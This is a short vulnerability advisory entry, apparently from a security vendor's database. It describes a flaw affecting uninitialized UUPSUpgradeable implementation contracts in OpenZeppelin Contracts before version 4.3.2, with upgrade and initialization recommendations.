PT-2021-24448 — Openzeppelin Openzeppelin Contracts+1

PT-2021-24448 · Openzeppelin · Openzeppelin Contracts+1

Published

2021-09-15

Updated

2021-09-15

None

No severity ratings or metrics are available. When they are, we'll update the corresponding info on the page.

Name of the Vulnerable Software and Affected Versions: @openzeppelin/contracts versions prior to 4.3.2 @openzeppelin/contracts-upgradeable versions prior to 4.3.2

Description: The issue affects upgradeable contracts using UUPSUpgradeable and may lead to an attack on uninitialized implementation contracts.

Recommendations: For versions prior to 4.3.2, update to version 4.3.2 of @openzeppelin/contracts and @openzeppelin/contracts-upgradeable. As a temporary workaround, initialize implementation contracts using UUPSUpgradeable by invoking the initializer function, usually called initialize.

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Related Identifiers

GHSA-Q4H9-46XG-M3X9

Affected Products

Openzeppelin Contracts

@Openzeppelin/Contracts-Upgradeable